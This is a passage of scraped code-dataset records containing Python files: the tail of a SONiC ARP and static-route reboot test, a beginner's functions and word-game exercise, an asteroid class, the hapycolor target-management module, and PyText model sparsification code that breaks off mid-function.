DUT\")\n st.reboot(vars.D1, \"warm\")\n st.log(\"Verifying static route entries after save and warm-reboot\")\n st.wait(5)\n static_route_verify()\n st.log(\"Verifying dynamic ARP entries after save and warm-reboot\")\n if not arp_obj.verify_arp(vars.D1, data.ipv4_address_tgen, data.src_mac_addr, vars.D1T1P1):\n st.report_fail(\"ARP_entry_dynamic_entry_fail\", data.ipv4_address_tgen, vars.D1)\n else:\n st.log(\"Verified that dynamic ARP entry is present in arp table\")\n if st.get_ui_type(vars.D1) != \"click\":\n st.log(\"Verifying static ARP entries after save and warm-reboot\")\n if not arp_obj.verify_arp(vars.D1, data.static_arp_ip, data.static_arp_mac, \"\"):\n st.report_fail(\"static_arp_create_fail\", vars.D1)\n else:\n st.log(\"Verified that static ARP entry is present in arp table\")\n st.report_pass(\"test_case_passed\")\n\ndef test_ft_arp_static_route_config_mgmt_verifying_config_with_save_fast_reboot():\n '''\n Author: Surendra Kumar Vella(surendrakumar.vella@broadcom.com)\n Verify static ARP route config after save fast-reboot\n '''\n st.log(\"Performing fast-reboot on DUT\")\n st.reboot(vars.D1, \"fast\")\n st.log(\"Verifying static route entries after save and fast-reboot\")\n st.wait(5)\n static_route_verify()\n adding_dynamic_arp()\n st.log(\"Verifying dynamic ARP entries after save and fast-reboot\")\n if not arp_obj.verify_arp(vars.D1, data.ipv4_address_tgen, data.src_mac_addr, vars.D1T1P1):\n st.report_fail(\"ARP_entry_dynamic_entry_fail\", data.ipv4_address_tgen, vars.D1)\n else:\n st.log(\"Verified that dynamic ARP entry is present in arp table\")\n st.report_pass(\"test_case_passed\")\n\n\ndef test_ft_arp_static_route_config_mgmt_verifying_config_with_save_reboot():\n '''\n Author: Surendra Kumar Vella(surendrakumar.vella@broadcom.com)\n Verify static ARP route config after save cold-reboot\n '''\n st.log(\"Performing reboot on DUT\")\n st.reboot(vars.D1)\n st.log(\"Verifying static route entries after save and reboot\")\n st.wait(5)\n static_route_verify()\n adding_dynamic_arp()\n st.log(\"Verifying dynamic ARP entries after save and reboot\")\n if not arp_obj.verify_arp(vars.D1, data.ipv4_address_tgen, data.src_mac_addr, vars.D1T1P1):\n st.report_fail(\"ARP_entry_dynamic_entry_fail\", data.ipv4_address_tgen, vars.D1)\n else:\n st.log(\"Verified that dynamic ARP entry is present in arp table\")\n st.report_pass(\"test_case_passed\")\n","repo_name":"sonic-net/sonic-mgmt","sub_path":"spytest/tests/routing/test_arp_static_route_long_run.py","file_name":"test_arp_static_route_long_run.py","file_ext":"py","file_size_in_byte":8582,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"51"} +{"seq_id":"25906283036","text":"# function in python\n\n# Non - Parameterized\ndef addNumbers():\n a = int(input('Enter first number'))\n b = int(input('Enter 2nd number'))\n print(a+b)\n\n\n# Parameterized\ndef addNumbersP(a, b):\n return a+b\n\n# num1 = input('Enter first number')\n# print(num1.isalnum())\n\n# num1 = int(input('Enter first number'))\n# num2 = int(input('Enter 2nd number'))\nprint()\n# result = addNumbersP(num1, num2)\n\n# if result > 100:\n# print(result)\n\n# def checkOddEven():\n# a = int(input('Enter a number'))\n# if a%2 == 0:\n# print('Given number is Even')\n# else:\n# print('Given number is Odd')\n\n# checkOddEven()\n\n# def checkOddEvenP(a):\n# if a%2 == 0:\n# print('Given number is Even')\n# else:\n# print('Given number is Odd')\n\n# num = int(input('Enter a number'))\n# checkOddEvenP(num)\n\n\nimport random\n\ndef wordgame(words):\n score = 0\n for i in words:\n w = list(i)\n random.shuffle(w)\n print(w)\n a = input('Enter: ')\n if a == i:\n score += 1\n return score\n\nfruits = ['apple', 'orange', 'grapes', 'banana', 'pineapple']\nresult = wordgame(fruits)\nprint('Your Score is: ', result)","repo_name":"mesujitg/python_march_2022","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"18672232689","text":"import random\nclass Asteroide:\n def __init__(asteroide):\n asteroide.x = 0\n asteroide.y = 0\n asteroide.raio = 0\n\n\n\n def imprimeValores(asteroide):\n print(\"posição x\", asteroide.x, \"posição y\", asteroide.y, \"raio\", asteroide.raio)\n\n def PosRaioRamdom(asteroide,telaX,telaY):\n asteroide.raio = random.randint(1, 40)\n asteroide.x = random.randint(asteroide.raio*2,telaX-asteroide.raio*2)\n asteroide.y = random.randint(asteroide.raio*2,telaY-asteroide.raio*2)\n\n def lista(asteroide):\n asteroide1 = Asteroide()\n asteroide2 = Asteroide()\n asteroide3 = Asteroide()\n asteroide4 = Asteroide()\n asteroide5 = Asteroide()\n listaAsteroide = {asteroide1, asteroide2, asteroide3, asteroide4, asteroide5}\n return listaAsteroide\n\n def cores(asteroide):\n #BLACK = (0, 0, 0)\n WHITE = (255, 255, 255)\n GREEN = (0, 255, 0)\n RED = (255, 0, 0)\n SPREENGGREEN = (0, 255, 127)\n INDIGO = (75, 0, 130)\n listaCores = {WHITE, GREEN, RED, SPREENGGREEN, INDIGO}\n return listaCores","repo_name":"welgt/Exercicios_python_pi2_Dp","sub_path":"Aula06/Asteroide.py","file_name":"Asteroide.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"35902436012","text":"\"\"\"\n.. role:: python(code)\n :language: python\n\nThis module defines all the methods needed to interact with all the targets\nimplemented in the :mod:`hapycolor.targets` package.\n\nTo add a new target, a class inheriting from :class:`base.Target` needs to be\nimplemented and its module should be imported in this very module, else,\nhapycolor will fail to find the new target. Currently, the :func:`reconfigure`\nfunction needs the class to be named after a PascalCase version of its module's\nname.\n\n.. note::\n A list `__all__` could be used to define all the modules to be imported and\n then :python:`from . import *` would import them all, but strangely,\n in this case, sphinx_ fails to generate the documentation of this file.\n\n.. _sphinx: http://www.sphinx-doc.org/en/stable/\n\n.. note:: Maybe, a future version of this project would be able to get rid of\n the class name/module name constraint by analyzing the classes contained\n in the module and retrieving the one that implements :class:`base.Target`.\n\"\"\"\n\nimport platform\nimport enum\nimport re\nfrom hapycolor import config\nfrom hapycolor import exceptions\nfrom hapycolor.targets import vim, iterm, wallpaper, lightline, gnome_terminal, \\\n yabar, i3, rofi, base\n\n\ndef initialize_target(target):\n \"\"\"\n Initializes a given target. If the intialization is successful, i.e. the\n user entered a correct information, then, the target's section 'enabled' of\n the configuration file will be saved as 'True', in addition of saving other\n possible data. Else, the former section will be marked as 'False'.\n\n :arg target: one of the subclasses of :class:`Target`\n \"\"\"\n print(\"Initializing {}\".format(target.__name__))\n while not target.is_config_initialized():\n try:\n target.initialize_config()\n except exceptions.WrongInputError as e:\n print(e.msg)\n if not retry():\n break\n\ndef reconfigure(target):\n while 1:\n try:\n target.reconfigure()\n break\n except exceptions.WrongInputError as e:\n print(e.msg)\n if not retry():\n break\n\n\ndef is_target_subclass(clazz):\n try:\n return issubclass(clazz, base.Target)\n except TypeError:\n return False\n\n\ndef get_class(target_str):\n \"\"\"\n Returns the class which name correspond to the string\n\n :param target_str: a string representing a target module.\n :raise: raises an :exc:`exceptions.InvalidTarget` if a module cannot be\n resolve from the provided string, or if there are no matching classes\n defined in the module that implement a :class:`Target`.\n \"\"\"\n def convert(name):\n \"\"\"Convert PascalCase to snake_case\"\"\"\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n\n msg = \"Input {} does not match a module containing a Target class\".format(target_str)\n try:\n clazz = eval(convert(target_str) + \".\" + target_str)\n except (AttributeError, NameError) as err:\n raise exceptions.InvalidTarget(msg) from err\n\n if not is_target_subclass(clazz):\n raise exceptions.InvalidTarget(msg)\n return clazz\n\n\ndef retry():\n \"\"\"\n When initializing targets, asks for a retry if the user failed\n to enter correct inputs. This class is usefull in order to\n test the targets' initializations\n \"\"\"\n return input(\"\\nAbort? (y/n): \").lower() == \"n\"\n\n\ndef get_all_names():\n \"\"\"\n Get all target names\n \"\"\"\n all_targets = base.Target.__subclasses__()\n return [t.__name__ for t in all_targets]\n\n\nclass OS(enum.Enum):\n LINUX = 0\n DARWIN = 1\n\n\ndef os():\n platform_os = platform.system()\n if platform_os == \"Darwin\":\n return OS.DARWIN\n elif platform_os == \"Linux\":\n return OS.LINUX\n else:\n raise exceptions.PlatformNotSupportedError()\n\n\ndef get_compatible():\n \"\"\"\n Get all compatible targets\n \"\"\"\n all_targets = base.Target.__subclasses__()\n # Filters out the incompatible or disabled targets\n return list(filter(lambda t: os() in t.compatible_os(),\n all_targets))\n\n\ndef get_compatible_names():\n \"\"\"\n Get str names of all compatible targets\n \"\"\"\n return [t.__name__ for t in get_compatible()]\n\n\ndef get_enabled():\n \"\"\"\n Get all enabled targets\n \"\"\"\n all_targets = base.Target.__subclasses__()\n return list(filter(lambda t: t.is_enabled() == True, all_targets))\n\n\ndef get():\n return base.Target.__subclasses__()\n\n\ndef export(palette, image_path):\n \"\"\"\n Exports a palette to all the compatible and enabled targets\n \"\"\"\n targets = get_compatible()\n for t in targets:\n if t.is_enabled():\n print(\"Exporting: \", t.__name__)\n try:\n t.export(palette, image_path)\n except exceptions.ExportTargetFailure as e:\n print(str(e))\n e.disable_target()\n","repo_name":"rvdz/hapycolor","sub_path":"hapycolor/targets/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"23652800094","text":"import itertools\nimport json\nimport math\nimport os\nimport sys\nfrom enum import Enum\nfrom typing import List\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom pytext.common.constants import Stage\nfrom pytext.config import ConfigBase\nfrom pytext.config.component import Component, ComponentType\nfrom pytext.models.crf import CRF\nfrom pytext.models.model import Model\nfrom pytext.utils import timing\nfrom pytext.utils.file_io import PathManager\n\n\nclass State(Enum):\n ANALYSIS = \"Analysis\"\n OTHERS = \"Others\"\n\n\nclass Sparsifier(Component):\n __COMPONENT_TYPE__ = ComponentType.SPARSIFIER\n __EXPANSIBLE__ = True\n\n class Config(ConfigBase):\n pass\n\n def sparsify(self, *args, **kwargs):\n pass\n\n def sparsification_condition(self, *args, **kwargs):\n pass\n\n def get_sparsifiable_params(self, *args, **kwargs):\n pass\n\n def initialize(self, *args, **kwargs):\n pass\n\n def op_pre_epoch(self, *args, **kwargs):\n pass\n\n def save_model_state_for_all_rank(self):\n return False\n\n def get_current_sparsity(self, model: Model) -> float:\n trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n nonzero_params = sum(\n p.nonzero().size(0) for p in model.parameters() if p.requires_grad\n )\n return (trainable_params - nonzero_params) / trainable_params\n\n\nclass L0_projection_sparsifier(Sparsifier):\n \"\"\"\n L0 projection-based (unstructured) sparsification\n\n Args:\n weights (torch.Tensor): input weight matrix\n sparsity (float32): the desired sparsity [0-1]\n\n \"\"\"\n\n class Config(Sparsifier.Config):\n sparsity: float = 0.9\n starting_epoch: int = 2\n frequency: int = 1\n layerwise_pruning: bool = True\n accumulate_mask: bool = False\n\n def __init__(\n self,\n sparsity,\n starting_epoch,\n frequency,\n layerwise_pruning=True,\n accumulate_mask=False,\n ):\n assert 0 <= sparsity <= 1\n self.sparsity = sparsity\n assert starting_epoch >= 1\n self.starting_epoch = starting_epoch\n assert frequency >= 1\n self.frequency = frequency\n self.layerwise_pruning = layerwise_pruning\n self.accumulate_mask = accumulate_mask\n self._masks = None\n\n @classmethod\n def from_config(cls, config: Config):\n return cls(\n config.sparsity,\n config.starting_epoch,\n config.frequency,\n config.layerwise_pruning,\n config.accumulate_mask,\n )\n\n def sparsification_condition(self, state):\n return (\n state.stage == Stage.TRAIN\n and state.epoch >= self.starting_epoch\n and state.step_counter % self.frequency == 0\n )\n\n def sparsify(self, state):\n \"\"\"\n obtain a mask and apply the mask to sparsify\n \"\"\"\n model = state.model\n # compute new mask when conditions are True\n if self.sparsification_condition(state):\n masks = self.get_masks(model)\n # applied the computed mask, self.accumulate_mask handled separately\n if not self.accumulate_mask:\n self.apply_masks(model, masks)\n\n # if self.accumulate_mask is True, apply the existent mask irregardless Stage\n if self.accumulate_mask and self._masks is not None:\n self.apply_masks(model, self._masks)\n\n def get_sparsifiable_params(self, model: Model):\n sparsifiable_params = [p for p in model.parameters() if p.requires_grad]\n return sparsifiable_params\n\n def apply_masks(self, model: Model, masks: List[torch.Tensor]):\n \"\"\"\n apply given masks to zero-out learnable weights in model\n \"\"\"\n learnableparams = self.get_sparsifiable_params(model)\n assert len(learnableparams) == len(masks)\n for m, w in zip(masks, learnableparams):\n if len(m.size()):\n assert m.size() == w.size()\n w.data *= m.clone()\n # if accumulate_mask, remove a param permanently by also removing\n # its gradient\n if self.accumulate_mask:\n w.grad.data *= m.clone()\n\n def get_masks(\n self, model: Model, pre_masks: List[torch.Tensor] = None\n ) -> List[torch.Tensor]:\n \"\"\"\n Note: this function returns the masks only but do not sparsify or modify the\n weights\n\n prune x% of weights among the weights with \"1\" in pre_masks\n\n Args:\n model: Model\n pre_masks: list of FloatTensors where \"1\" means retained the weight and\n \"0\" means pruned the weight\n\n Return:\n masks: List[torch.Tensor], intersection of new masks and pre_masks, so\n that \"1\" only if the weight is selected after new masking and pre_mask\n \"\"\"\n learnableparams = self.get_sparsifiable_params(model)\n if pre_masks:\n self._masks = pre_masks\n if self._masks is None:\n # retain everything if no pre_masks given\n self._masks = [torch.ones_like(p) for p in learnableparams]\n\n assert len(learnableparams) == len(self._masks)\n for m, w in zip(self._masks, learnableparams):\n if len(m.size()):\n assert m.size() == w.size()\n\n if self.layerwise_pruning:\n masks = []\n for m, param in zip(self._masks, learnableparams):\n weights_abs = torch.abs(param.data).to(param.device)\n # absolute value of weights selected from existent masks\n weights_abs_masked_flat = torch.flatten(weights_abs[m.bool()])\n total_size = weights_abs_masked_flat.numel()\n if total_size > 0:\n # using ceil instead of floor() or int()\n # because at least one element in the tensor required to be selected\n max_num_nonzeros = math.ceil(total_size * (1 - self.sparsity))\n # only pruned among the weights slected from existent masks\n topkval = (\n torch.topk(weights_abs_masked_flat, max_num_nonzeros)\n .values.min()\n .item()\n )\n # intersection of the new mask and pre_mexistent masks,\n # mask == 1 retain, mask == 0 pruned,\n mask = (weights_abs >= topkval).float() * m\n else:\n mask = param.new_empty(())\n masks.append(mask)\n else:\n # concatenated flatten tensor of learnableparams that have _masks as True\n learnableparams_masked_flat = torch.cat(\n [\n torch.flatten(p[m.bool()])\n for m, p in zip(self._masks, learnableparams)\n ],\n dim=0,\n )\n # using ceil instead of floor() or int() because at least one element\n # in the tensor required to be selected\n max_num_nonzeros = math.ceil(\n learnableparams_masked_flat.numel() * (1 - self.sparsity)\n )\n # select globally the top-k th weight among weights selected from _masks\n topkval = (\n torch.topk(torch.abs(learnableparams_masked_flat), max_num_nonzeros)\n .values.min()\n .item()\n )\n # intersection of the new mask and _masks,\n # mask == 1 retain, mask == 0 pruned,\n masks = [\n (torch.abs(p.data) >= topkval).float() * m\n if p.numel() > 0\n else p.new_empty(())\n for m, p in zip(self._masks, learnableparams)\n ]\n\n if self.accumulate_mask:\n self._masks = masks\n\n return masks\n\n\nclass CRF_SparsifierBase(Sparsifier):\n class Config(Sparsifier.Config):\n starting_epoch: int = 1\n frequency: int = 1\n\n def sparsification_condition(self, state):\n if state.stage == Stage.TRAIN:\n return False\n\n return (\n state.epoch >= self.starting_epoch\n and state.step_counter % self.frequency == 0\n )\n\n def get_sparsifiable_params(self, model: nn.Module):\n for m in model.modules():\n if isinstance(m, CRF):\n return m.transitions.data\n\n def get_transition_sparsity(self, transition):\n nonzero_params = transition.nonzero().size(0)\n return (transition.numel() - nonzero_params) / transition.numel()\n\n\nclass CRF_L1_SoftThresholding(CRF_SparsifierBase):\n \"\"\"\n implement l1 regularization:\n min Loss(x, y, CRFparams) + lambda_l1 * ||CRFparams||_1\n\n and solve the optimiation problem via (stochastic) proximal gradient-based\n method i.e., soft-thresholding\n\n param_updated = sign(CRFparams) * max ( abs(CRFparams) - lambda_l1, 0)\n \"\"\"\n\n class Config(CRF_SparsifierBase.Config):\n lambda_l1: float = 0.001\n\n def __init__(self, lambda_l1: float, starting_epoch: int, frequency: int):\n self.lambda_l1 = lambda_l1\n assert starting_epoch >= 1\n self.starting_epoch = starting_epoch\n assert frequency >= 1\n self.frequency = frequency\n\n @classmethod\n def from_config(cls, config: Config):\n return cls(config.lambda_l1, config.starting_epoch, config.frequency)\n\n def sparsify(self, state):\n if not self.sparsification_condition(state):\n return\n model = state.model\n transition_matrix = self.get_sparsifiable_params(model)\n transition_matrix_abs = torch.abs(transition_matrix)\n assert (\n len(state.optimizer.param_groups) == 1\n ), \"different learning rates for multiple param groups not supported\"\n lrs = state.optimizer.param_groups[0][\"lr\"]\n threshold = self.lambda_l1 * lrs\n transition_matrix = torch.sign(transition_matrix) * torch.max(\n (transition_matrix_abs - threshold),\n transition_matrix.new_zeros(transition_matrix.shape),\n )\n current_sparsity = self.get_transition_sparsity(transition_matrix)\n print(f\"sparsity of CRF transition matrix: {current_sparsity}\")\n\n\nclass CRF_MagnitudeThresholding(CRF_SparsifierBase):\n \"\"\"\n magnitude-based (equivalent to projection onto l0 constraint set) sparsification\n on CRF transition matrix. Preserveing the top-k elements either rowwise or\n columnwise until sparsity constraint is met.\n \"\"\"\n\n class Config(CRF_SparsifierBase.Config):\n sparsity: float = 0.9\n grouping: str = \"row\"\n\n def __init__(self, sparsity, starting_epoch, frequency, grouping):\n assert 0 <= sparsity <= 1\n self.sparsity = sparsity\n assert starting_epoch >= 1\n self.starting_epoch = starting_epoch\n assert frequency >= 1\n self.frequency = frequency\n assert (\n grouping == \"row\" or grouping == \"column\"\n ), \"grouping needs to be row or column\"\n self.grouping = grouping\n\n @classmethod\n def from_config(cls, config: Config):\n return cls(\n config.sparsity, config.starting_epoch, config.frequency, config.grouping\n )\n\n def sparsify(self, state):\n if not self.sparsification_condition(state):\n return\n model = state.model\n transition_matrix = self.get_sparsifiable_params(model)\n num_rows, num_cols = transition_matrix.shape\n trans_abs = torch.abs(transition_matrix)\n if self.grouping == \"row\":\n max_num_nonzeros = math.ceil(num_cols * (1 - self.sparsity))\n topkvals = (\n torch.topk(trans_abs, k=max_num_nonzeros, dim=1)\n .values.min(dim=1, keepdim=True)\n .values\n )\n\n else:\n max_num_nonzeros = math.ceil(num_rows * (1 - self.sparsity))\n topkvals = (\n torch.topk(trans_abs, k=max_num_nonzeros, dim=0)\n .values.min(dim=0, keepdim=True)\n .values\n )\n\n # trans_abs < topkvals is a broadcasted comparison\n transition_matrix[trans_abs < topkvals] = 0.0\n current_sparsity = self.get_transition_sparsity(transition_matrix)\n print(f\"sparsity of CRF transition matrix: {current_sparsity}\")\n\n\nclass SensitivityAnalysisSparsifier(Sparsifier):\n class Config(Sparsifier.Config):\n pre_train_model_path: str = \"\"\n analyzed_sparsity: float = 0.8\n # we don't use all eval data for analysis, only use a portion of the data.\n max_analysis_batches: int = 0\n # allow the user to skip pruning for some weight. Here we set the max\n # number of weight tensor can be skipped for pruning.\n max_skipped_weight: int = 0\n # if we already did sensitivity analysis before\n pre_analysis_path: str = \"\"\n sparsity: float = 0.8\n # if we use iterative pruning\n iterative_pruning: bool = True\n # the total number of pruning iterations for iterative pruning, where where\n # we incrementally increase the sparsity at each iteration\n pruning_iterations: int = 2\n # the ratio of the start sparsity to the final sparsity\n start_sparsity_ratio: float = 0.5\n\n def __init__(\n self,\n pre_train_model_path,\n analyzed_sparsity,\n max_analysis_batches,\n max_skipped_weight,\n pre_analysis_path,\n sparsity,\n iterative_pruning,\n pruning_iterations,\n start_sparsity_ratio,\n ):\n assert PathManager.exists(\n pre_train_model_path\n ), \"The pre-trained model must be exist\"\n self.pre_train_model_path = pre_train_model_path\n self.param_dict = None\n assert (\n 0.0 <= analyzed_sparsity <= 1.0\n ), \"Analyzed sparsity need to be in the range of [0, 1]\"\n self.analyzed_sparsity = analyzed_sparsity\n self.max_analysis_batches = max_analysis_batches\n self.max_skipped_weight = max_skipped_weight\n self.require_mask_parameters = []\n self.pre_analysis_path = pre_analysis_path\n assert (\n 0.0 <= sparsity <= 1.0\n ), \"Pruning sparsity need to be in the range of [0, 1]\"\n self.sparsity = sparsity\n self._masks = None\n self.analysis_state = State.OTHERS\n self.iterative_pruning = iterative_pruning\n\n # members used for iterative pruning\n if self.iterative_pruning:\n assert (\n pruning_iterations > 1\n ), \"iterative pruning should contains at least two pruning iterations\"\n self.pruning_iterations = pruning_iterations\n self.start_sparsity = start_sparsity_ratio * sparsity\n self.end_sparsity = self.sparsity\n self.epochs_per_iter = 0\n self.sparsity_increment = 0.0\n\n @classmethod\n def from_config(cls, config: Config):\n return cls(\n config.pre_train_model_path,\n config.analyzed_sparsity,\n config.max_analysis_batches,\n config.max_skipped_weight,\n config.pre_analysis_path,\n config.sparsity,\n config.iterative_pruning,\n config.pruning_iterations,\n config.start_sparsity_ratio,\n )\n\n def get_sparsifiable_params(self, model):\n param_dict = {}\n for module_name, m in model.named_modules():\n # Search the name of all module_name in named_modules\n # only test the parameters in nn.Linear\n if isinstance(m, nn.Linear):\n # module_name: module.xxx\n # param_name: module.xxx.weight\n # we only check weight tensor\n param_name = module_name + \".weight\"\n param_dict[param_name] = m.weight\n\n return param_dict\n\n def get_mask_for_param(self, param, sparsity):\n \"\"\"\n generate the prune mask for one weight tensor.\n \"\"\"\n n = int(sparsity * param.nelement())\n if n > 0:\n # If n > 0, we need to remove n parameters, the threshold\n # equals to the n-th largest parameters.x\n threshold = float(param.abs().flatten().kthvalue(n - 1)[0])\n else:\n # If n == 0, it means all parameters need to be kept.\n # Because the absolute parameter value >= 0, setting\n # threshold to -1 ensures param.abs().ge(threshold)\n # is True for all the parameters.\n threshold = -1.0\n # reverse_mask indiciates the weights that need to be kept\n mask = param.abs().ge(threshold).float()\n\n return mask\n\n def layer_wise_analysis(\n self, param_name, param_dict, trainer, state, eval_data, metric_reporter\n ):\n # perform pruning for the target param with param_name\n if param_name is None:\n prunable_param_shape = None\n else:\n prunable_param = param_dict[param_name]\n # include the shape information for better analysis\n prunable_param_shape = list(prunable_param.shape)\n mask = self.get_mask_for_param(prunable_param, self.analyzed_sparsity)\n with torch.no_grad():\n param_dict[param_name].data.mul_(mask)\n # get the eval_metric for the pruned model\n with torch.no_grad():\n # set the number of batches of eval data for analysis\n analysis_data = eval_data\n if self.max_analysis_batches > 0:\n analysis_data = itertools.islice(eval_data, self.max_analysis_batches)\n eval_metric = trainer.run_epoch(state, analysis_data, metric_reporter)\n current_metric = metric_reporter.get_model_select_metric(eval_metric)\n if metric_reporter.lower_is_better:\n current_metric = -current_metric\n\n return current_metric, prunable_param_shape\n\n def find_params_to_prune(self, metric_dict, max_skip_weight_num):\n require_mask_parameters = sorted(\n metric_dict.keys(), reverse=True, key=lambda param: metric_dict[param]\n )\n metric_sensitivities_by_param = [\n metric_dict[p] for p in require_mask_parameters\n ]\n\n skipped_weight_num = 0\n while skipped_weight_num < max_skip_weight_num:\n # calculate the mean and sandard deviation\n mean_ = np.mean(metric_sensitivities_by_param[:-skipped_weight_num])\n std_ = np.std(metric_sensitivities_by_param[:-skipped_weight_num])\n # skip runing of the parameter if the metric disensitivity is\n # less than mean_ - 3 * std_, otherwise break.\n if (\n metric_sensitivities_by_param[-skipped_weight_num - 1]\n >= mean_ - 3 * std_\n ):\n break\n skipped_weight_num += 1\n\n require_mask_parameters = require_mask_parameters[:-skipped_weight_num]\n\n # return how many weight are skipped during this iteration\n return require_mask_parameters, skipped_weight_num\n\n def sensitivity_analysis(\n self, trainer, state, eval_data, metric_reporter, train_config\n ):\n \"\"\"\n Analysis the sensitivity of each weight tensor to the metric.\n Prune the weight tensor one by one and evaluate the metric if the\n correspond weight tensor is pruned.\n Args:\n trainer (trainer): batch iterator of training data\n state (TrainingState): the state of the current training\n eval_data (BatchIterator): batch iterator of evaluation data\n metric_reporter (MetricReporter): compute metric based on training\n output and report results to console, file.. etc\n train_config (PyTextConfig): training config\n\n Returns:\n analysis_result: a string of each layer sensitivity to metric.\n \"\"\"\n print(\"Analyzed_sparsity: {}\".format(self.analyzed_sparsity))\n print(\"Evaluation metric_reporter: {}\".format(type(metric_reporter).__name__))\n output_path = (\n os.path.dirname(train_config.task.metric_reporter.output_path)\n + \"/sensitivity_analysis_sparsifier.ckp\"\n )\n\n # param_dict: the dict maps weight tensor to the parameter name\n self.param_dict = self.get_sparsifiable_params(state.model)\n\n # set model to evaluation mode\n state.stage = Stage.EVAL\n state.model.eval(Stage.EVAL)\n\n metric_dict = {}\n all_param_list = [None] + list(self.param_dict.keys())\n print(\"All prunable parameters\", all_param_list)\n\n # print the sensitivity results for each weight\n print(\"#\" * 40)\n print(\"save the analysis result to: \", output_path)\n print(\"Pruning Sensitivity Test: param / shape / eval metric\")\n\n # iterate through all_param_list to test pruning snesitivity\n for param_name in all_param_list:\n print(\"=\" * 40)\n print(\"Testing {}\".format(param_name))\n state.model.load_state_dict(self.loaded_model[\"model_state\"])\n\n current_metric, prunable_param_shape = self.layer_wise_analysis(\n param_name, self.param_dict, trainer, state, eval_data, metric_reporter\n )\n if param_name is None:\n baseline_metric = current_metric\n metric_dict[param_name] = current_metric - baseline_metric\n print(\"#\" * 40)\n\n # remove baseline metric from the analysis results\n if None in metric_dict:\n del metric_dict[None]\n # write the test result into the checkpoint\n if state.rank == 0:\n with PathManager.open(output_path, \"w\") as fp:\n json.dump(metric_dict, fp)\n\n return metric_dict\n\n def sparsification_condition(self, state):\n return state.stage == Stage.TRAIN\n\n def apply_masks(self, model: Model, masks: List[torch.Tensor]):\n \"\"\"\n apply given masks to zero-out learnable weights in model\n \"\"\"\n learnable_params = self.get_required_sparsifiable_params(model)\n assert len(learnable_params) == len(masks)\n for m, w in zip(masks, learnable_params):\n if len(m.size()):\n assert m.size() == w.size()\n w.data *= m\n\n def get_current_sparsity(self, model: Model) -> float:\n trainable_params = sum(\n module.weight.data.numel()\n for name, module in model.named_modules()\n if isinstance(module, nn.Linear)\n )\n nonzero_params = sum(\n module.weight.data.nonzero().size(0)\n for name, module in model.named_modules()\n if isinstance(module, nn.Linear)\n )\n return (trainable_params - nonzero_params) / trainable_params\n\n def sparsify(self, state):\n \"\"\"\n apply the mask to sparsify the weight tensor\n \"\"\"\n # do not sparsify the weight tensor during the analysis\n if self.analysis_state == State.ANALYSIS:\n return\n\n model = state.model\n # compute new mask when conditions are True\n if self.sparsification_condition(state):\n # applied the computed mask to sparsify the weight\n self.apply_masks(model, self._masks)\n\n def get_required_sparsifiable_params(self, model: Model):\n # param_dict contains all parameters, select requied weights\n # if we reload analysis result from file, we need to calculate\n # all param_dict again.\n if self.param_dict is None:\n self.param_dict = self.get_sparsifiable_params(model)\n\n return [self.param_dict[p] for p in self.require_mask_parameters]\n\n def get_masks(self, model: Model) -> List[torch.Tensor]:\n \"\"\"\n Note: this function returns the masks for each weight tensor if\n that tensor is required to be pruned\n\n prune x% of weights items among the weights with \"1\" in mask (self._mask)\n indicate the remained weights, with \"0\" indicate pruned weights\n\n Args:\n model: Model\n\n Return:\n masks: List[torch.Tensor], the prune mask for the weight of all\n layers\n \"\"\"\n learnable_params = self.get_required_sparsifiable_params(model)\n\n masks = []\n for param in learnable_params:\n mask = self.get_mask_for_param(param, self.sparsity)\n masks.append(mask)\n\n return masks\n\n def load_analysis_from_path(self):\n assert PathManager.isfile(self.pre_analysis_path), \"{} is not a file\".format(\n self.pre_analysis_path\n )\n with PathManager.open(self.pre_analysis_path, \"r\") as fp:\n metric_dict = json.load(fp)\n\n return metric_dict\n\n @timing.time(\"sparsifier initialize\")\n def initialize(self, trainer, state, eval_data, metric_reporter, train_config):\n assert self.pre_train_model_path, \"must have a pre-train model\"\n # load the pretrained model\n print(\"load the pretrained model from: \" + self.pre_train_model_path)\n self.loaded_model = torch.load(\n self.pre_train_model_path, map_location=torch.device(\"cpu\")\n )\n\n # if user specify the analysis file, load it from path\n if self.pre_analysis_path:\n metric_dict = self.load_analysis_from_path()\n\n else:\n self.analysis_state = State.ANALYSIS\n metric_dict = self.sensitivity_analysis(\n trainer, state, eval_data, metric_reporter, train_config\n )\n # finish the analysis, sparsifier can apply prune mask.\n self.analysis_state = State.OTHERS\n\n # skip some of the weight tensors from pruning. The user can\n # specify the max_skipped_weight, which limit the max number\n # of weight to be skipped.\n self.require_mask_parameters, skipped_weight_num = self.find_params_to_prune(\n metric_dict, self.max_skipped_weight\n )\n\n for p in self.require_mask_parameters:\n print(p, \" \", metric_dict[p])\n print(\"#\" * 40)\n sys.stdout.flush()\n print(str(skipped_weight_num) + \" weight tensors are skipped for pruning\")\n\n if self.iterative_pruning:\n assert (\n trainer.config.early_stop_after == 0\n ), \"Can not set early stop for iterative pruning\"\n assert (\n trainer.config.epochs % self.pruning_iterations == 0\n ), \"total training epochs should be divided by the pruning iterations\"\n self.epochs_per_iter = trainer.config.epochs // self.pruning_iterations\n # init sparsity as self.start_sparsity, calculate the sparsity\n # increment of each pruning iteration.\n self.sparsity_increment = (self.end_sparsity - self.start_sparsity) / (\n self.pruning_iterations - 1\n )\n self.sparsity = self.start_sparsity\n print(\n \"sparsity start from: \",\n self.sparsity,\n \" increment of: \",\n self.sparsity_increment,\n )\n\n # pruning from a pre-trained weights\n state.model.load_state_dict(self.loaded_model[\"model_state\"])\n # initialize and generate the pruning mask. We don't want to generate\n # the mask for each step. Otherwise, it will be time inefficient.\n self._masks = self.get_masks(state.model)\n\n def increase_sparsity(self, state):\n self.sparsity += self.sparsity_increment\n print(\"sparsity increased to: \", self.sparsity)\n\n def save_model_state_for_all_rank(self):\n # all machines should save 